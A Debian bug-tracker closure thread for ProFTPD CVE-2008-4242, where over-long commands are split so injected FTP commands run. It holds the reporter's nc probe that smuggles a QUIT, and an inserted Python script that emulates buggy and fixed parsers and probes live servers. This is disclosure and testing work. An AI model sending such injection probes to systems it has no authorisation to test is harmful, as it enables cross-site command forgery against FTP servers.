Your message dated Sun, 19 Oct 2008 21:02:50 +0000
with message-id <[EMAIL PROTECTED]>
and subject line Bug#502674: fixed in proftpd-dfsg 1.3.1-15
has caused the Debian Bug report #502674,
regarding proftpd-basic: command line split CSRF
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
502674: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=502674
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: proftpd-basic
Version: 1.3.1-14
Severity: grave
Tags: security
Justification: user security hole

Hi,

proftpd in debian is vulnerable to CVE-2008-4242:

> ProFTPD 1.3.1 interprets long commands from an FTP client as
> multiple commands, which allows remote attackers to conduct
> cross-site request forgery (CSRF) attacks and execute arbitrary FTP
> commands via a long ftp:// URI that leverages an existing session
> from the FTP client implementation in a web browser.

See:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=2008-4242

http://securityreason.com/achievement_securityalert/56

http://bugs.proftpd.org/show_bug.cgi?id=3115

There is a patch in proftpd CVS (src/netio.c 1.34 and src/main.c
1.345), but it will need backporting to the version in Debian.

The equivalent bugs in ftpd and ftpd-ssl are #500278 and #500518, but
the codebase has diverged enough that the patches aren't applicable.

To test for the vulnerability:

$ perl -e 'print "A"x1022,"QUIT\n"' | nc localhost 21
220 ProFTPD 1.3.1 Server (Debian) [10.1.1.2]
500 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA not understood
221 Goodbye.


This splits the command-line and then incorrectly honours the QUIT.

Ian.


-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: i386 (i686)

Kernel: Linux 2.6.26-1-686 (SMP w/1 CPU core)
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages proftpd-basic depends on:
ii  adduser                   3.110          add and remove users and groups
ii  debconf                   1.5.24         Debian configuration management sy
ii  debianutils               2.30           Miscellaneous utilities specific t
ii  libacl1                   2.2.47-2       Access control list shared library
ii  libattr1                  1:2.4.43-1     Extended attribute shared library
ii  libc6                     2.7-15         GNU C Library: Shared libraries
ii  libcap1                   1:1.10-14      support for getting/setting POSIX.
ii  libncurses5               5.6+20081011-1 shared libraries for terminal hand
ii  libpam-runtime            1.0.1-4        Runtime support for the PAM librar
ii  libpam0g                  1.0.1-4        Pluggable Authentication Modules l
ii  libssl0.9.8               0.9.8g-13      SSL shared libraries
ii  libwrap0                  7.6.q-16       Wietse Venema's TCP wrappers libra
ii  netbase                   4.34           Basic TCP/IP networking system
ii  sed                       4.1.5-8        The GNU sed stream editor
ii  ucf                       3.0010         Update Configuration File: preserv
ii  update-inetd              4.31           inetd configuration file updater

proftpd-basic recommends no packages.

Versions of packages proftpd-basic suggests:
ii  openssl                       0.9.8g-13  Secure Socket Layer (SSL) binary a
pn  proftpd-doc                   <none>     (no description available)
pn  proftpd-mod-ldap              <none>     (no description available)
pn  proftpd-mod-mysql             <none>     (no description available)
pn  proftpd-mod-pgsql             <none>     (no description available)

-- debconf information:
* shared/proftpd/inetd_or_standalone: from inetd



--- End Message ---
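The probe in the report above works by pushing the QUIT past the server's per-line read limit so that the leftover bytes are parsed as a second command. The following is an added example, not code from the bug report or from ProFTPD: it models both a reader with that behaviour and a hardened one, runs the report's probe (and, as a generalisation, a browser-style "CWD <long path>" line with a harmless tail, to show the ftp:// URI angle the CVE text describes) through each, and includes a probe_live() helper that sends the same bytes to a real server. Everything about the reader (the LINE_MAX capacity of 1022 bytes, chosen to match the report's padding; the tail being left in the stream by the buggy reader; the fixed reader rejecting the line once and discarding up to the newline; the "CWD " framing a browser would use) is an assumption of this example, not a description of the upstream patch.

```python
"""Emulate and probe the command-splitting bug class behind CVE-2008-4242.

Added example; this is not code from the bug report or from ProFTPD.
Assumptions (hypothetical, chosen to match the report's probe): the server's
command reader stores at most LINE_MAX bytes of a line before returning;
the buggy reader leaves the unread tail in the stream, so it is parsed as a
second command; the hardened reader rejects the over-long line once and
discards the tail up to the next newline.
"""
from __future__ import annotations

import socket

LINE_MAX = 1022  # assumed per-line capacity of the reader; 1022 As fill it exactly


def build_probe(pad: int = LINE_MAX, tail: bytes = b"QUIT",
                prefix: bytes = b"") -> bytes:
    """One over-long line whose tail lands past the reader's limit.

    prefix models what a browser's FTP client would send for an ftp:// URI,
    e.g. b"CWD " followed by the URI path (assumed framing)."""
    body = prefix + b"A" * (pad - len(prefix))
    return body + tail + b"\r\n"


def _read_line(stream: bytes) -> tuple[bytes, bytes, bool]:
    """Read through the first newline or LINE_MAX bytes, whichever comes first.

    Returns (line without CRLF, unread remainder, newline_seen)."""
    limit = min(len(stream), LINE_MAX)
    nl = stream.find(b"\n", 0, limit)
    if nl != -1:
        return stream[:nl].rstrip(b"\r"), stream[nl + 1:], True
    return stream[:limit], stream[limit:], False


def parse_vulnerable(stream: bytes) -> list[bytes]:
    """Buggy reader: the unread tail of an over-long line becomes a new command."""
    cmds = []
    while stream:
        line, stream, _ = _read_line(stream)
        cmds.append(line)
    return cmds


def parse_fixed(stream: bytes) -> list[bytes]:
    """Hardened reader: an unterminated line is one (rejected) command and the
    rest of that line is discarded instead of being re-parsed."""
    cmds = []
    while stream:
        line, stream, newline_seen = _read_line(stream)
        if not newline_seen:
            nl = stream.find(b"\n")
            stream = b"" if nl == -1 else stream[nl + 1:]
        cmds.append(line)
    return cmds


def respond(cmds: list[bytes]) -> list[str]:
    """Minimal reply model: QUIT ends the session, anything else gets a 500."""
    replies = []
    for cmd in cmds:
        if cmd.upper() == b"QUIT":
            replies.append("221 Goodbye.")
            break
        replies.append("500 %s not understood" % cmd.decode("ascii", "replace"))
    return replies


def injected_quit_honoured(replies: list[str]) -> bool:
    """The signal the report looks for: a 221 after the 500 for the padding."""
    return any(r.startswith("221") for r in replies)


def probe_live(host: str, port: int = 21, timeout: float = 5.0) -> bool:
    """Send the probe to a real server; True means it honoured the split QUIT.

    Only run this against hosts you are authorised to test."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.recv(4096)  # greeting banner
        s.sendall(build_probe())
        data = b""
        try:
            while True:
                chunk = s.recv(4096)
                if not chunk:
                    break
                data += chunk
        except socket.timeout:
            pass
    return injected_quit_honoured(data.decode("ascii", "replace").splitlines())


if __name__ == "__main__":
    for name, parser in (("vulnerable", parse_vulnerable), ("fixed", parse_fixed)):
        replies = respond(parser(build_probe()))
        print(name, "honours injected QUIT:", injected_quit_honoured(replies))
```

Against a real server, probe_live() gives the same yes/no the nc one-liner gives by eye: a 221 reply following the 500 means the server honoured a command it was never sent as a line of its own. A server that answers only with the 500 (or closes the connection) is behaving like the hardened reader.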
--- Begin Message ---
Source: proftpd-dfsg
Source-Version: 1.3.1-15

We believe that the bug you reported is fixed in the latest version of
proftpd-dfsg, which is due to be installed in the Debian FTP archive:

proftpd-basic_1.3.1-15_i386.deb
  to pool/main/p/proftpd-dfsg/proftpd-basic_1.3.1-15_i386.deb
proftpd-dfsg_1.3.1-15.diff.gz
  to pool/main/p/proftpd-dfsg/proftpd-dfsg_1.3.1-15.diff.gz
proftpd-dfsg_1.3.1-15.dsc
  to pool/main/p/proftpd-dfsg/proftpd-dfsg_1.3.1-15.dsc
proftpd-doc_1.3.1-15_all.deb
  to pool/main/p/proftpd-dfsg/proftpd-doc_1.3.1-15_all.deb
proftpd-mod-ldap_1.3.1-15_i386.deb
  to pool/main/p/proftpd-dfsg/proftpd-mod-ldap_1.3.1-15_i386.deb
proftpd-mod-mysql_1.3.1-15_i386.deb
  to pool/main/p/proftpd-dfsg/proftpd-mod-mysql_1.3.1-15_i386.deb
proftpd-mod-pgsql_1.3.1-15_i386.deb
  to pool/main/p/proftpd-dfsg/proftpd-mod-pgsql_1.3.1-15_i386.deb
proftpd_1.3.1-15_all.deb
  to pool/main/p/proftpd-dfsg/proftpd_1.3.1-15_all.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Francesco Paolo Lovergine <[EMAIL PROTECTED]> (supplier of updated proftpd-dfsg package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.8
Date: Sun, 21 Sep 2008 23:32:46 +0200
Source: proftpd-dfsg
Binary: proftpd proftpd-basic proftpd-doc proftpd-mod-mysql proftpd-mod-pgsql proftpd-mod-ldap
Architecture: source i386 all
Version: 1.3.1-15
Distribution: unstable
Urgency: high
Maintainer: Francesco Paolo Lovergine <[EMAIL PROTECTED]>
Changed-By: Francesco Paolo Lovergine <[EMAIL PROTECTED]>
Description: 
 proftpd    - versatile, virtual-hosting FTP daemon
 proftpd-basic - versatile, virtual-hosting FTP daemon - binaries
 proftpd-doc - Versatile, virtual-hosting FTP daemon - documentation
 proftpd-mod-ldap - versatile, virtual-hosting FTP daemon - LDAP module
 proftpd-mod-mysql - versatile, virtual-hosting FTP daemon - MySQL module
 proftpd-mod-pgsql - versatile, virtual-hosting FTP daemon - PostgreSQL module
Closes: 502674
Changes: 
 proftpd-dfsg (1.3.1-15) unstable; urgency=high
 .
   * Fixed debian/changelog, which wrongly closed #496622 instead of #497622.
   * [PATCH,SECURITY] New 3115.dpatch.
     Fixes a cross-site forgery based on long command use, CVE-2008-4242.
     (closes: #502674)
Checksums-Sha1: 
 c97d15973d5a676d5cc8ffb7a7dd9b2d159f1f3b 1321 proftpd-dfsg_1.3.1-15.dsc
 b1b9f5182abbcb32a720e1f69a34318f3f5a3309 97531 proftpd-dfsg_1.3.1-15.diff.gz
 c3129f4d874546f23416923eaf5001db3615c292 684572 proftpd-basic_1.3.1-15_i386.deb
 1fb2939fd4614b8c4058c407272c56f21d0c1d29 202492 proftpd-mod-mysql_1.3.1-15_i386.deb
 dc89a972648ebcfcb9e6a55ae6a03125a6d1c6e2 201842 proftpd-mod-pgsql_1.3.1-15_i386.deb
 a28b40c5ab1750f2b7dd5e807758a249db5edf23 211834 proftpd-mod-ldap_1.3.1-15_i386.deb
 9d6a24c5674d59ddb0243fdc8507c3e558894b50 194510 proftpd_1.3.1-15_all.deb
 63046615a4e1e4f98a7c128f9ea6ce14bdc9082c 1255916 proftpd-doc_1.3.1-15_all.deb
Checksums-Sha256: 
 ebfe8803edae5d06a1bbb1c7e0f7c447eb63d16ea6228025227093f67496f494 1321 proftpd-dfsg_1.3.1-15.dsc
 f684002fae48a0d05a38ed5cad89164b6064a24f248720553b04cf6bb1941a3a 97531 proftpd-dfsg_1.3.1-15.diff.gz
 27499a107490259efd00992dd41364b6c363dfb7f5f1cb832f23fc5634ac4260 684572 proftpd-basic_1.3.1-15_i386.deb
 ceecc9f7118a51223635ad2d807a75a7f3e29346eca51b906edbd20b2040b70c 202492 proftpd-mod-mysql_1.3.1-15_i386.deb
 15a87d18e72e2d0675c2f0178ff89eb2dd5835db2908b54908d337d3cf18982c 201842 proftpd-mod-pgsql_1.3.1-15_i386.deb
 e4c801e4db9c0e33e15c8d2b94aa3e44ac7f30b3847e213bd2b200d3af8a3a99 211834 proftpd-mod-ldap_1.3.1-15_i386.deb
 d7b6137f6ef1595cf23df489d3e950a41ff827c60a61adc42f5ac6ee0642b4e5 194510 proftpd_1.3.1-15_all.deb
 be06f886d32cdd5bd001f532c77b82eec92db29c5b82f544cfbe69cdf35ae94b 1255916 proftpd-doc_1.3.1-15_all.deb
Files: 
 981d660d3a7aa5d17974ce0b5b92b155 1321 net optional proftpd-dfsg_1.3.1-15.dsc
 1e5840dc6945b7e97e640a87bfc44581 97531 net optional proftpd-dfsg_1.3.1-15.diff.gz
 e0fefa3fc3a8fba71bce622056180eef 684572 net optional proftpd-basic_1.3.1-15_i386.deb
 5f551dcc2644e34f3395b45ccbd9b779 202492 net optional proftpd-mod-mysql_1.3.1-15_i386.deb
 5c78b2dd0dfb539c0ff048475e923a5d 201842 net optional proftpd-mod-pgsql_1.3.1-15_i386.deb
 0a6161368d0b0af7de9794cbb0c1d047 211834 net optional proftpd-mod-ldap_1.3.1-15_i386.deb
 ec50823f6dc277dad1b271cd2f6fb4a0 194510 net optional proftpd_1.3.1-15_all.deb
 f556b945768c47be6df29a55d946fa4b 1255916 doc optional proftpd-doc_1.3.1-15_all.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEARECAAYFAkj7nfUACgkQpFNRmenyx0drPACfcornqvDnsU+6wF21cthTxKF9
AaAAoPufOw5rPBEWDN+KSCihkxxoHGFU
=bHMu
-----END PGP SIGNATURE-----



--- End Message ---
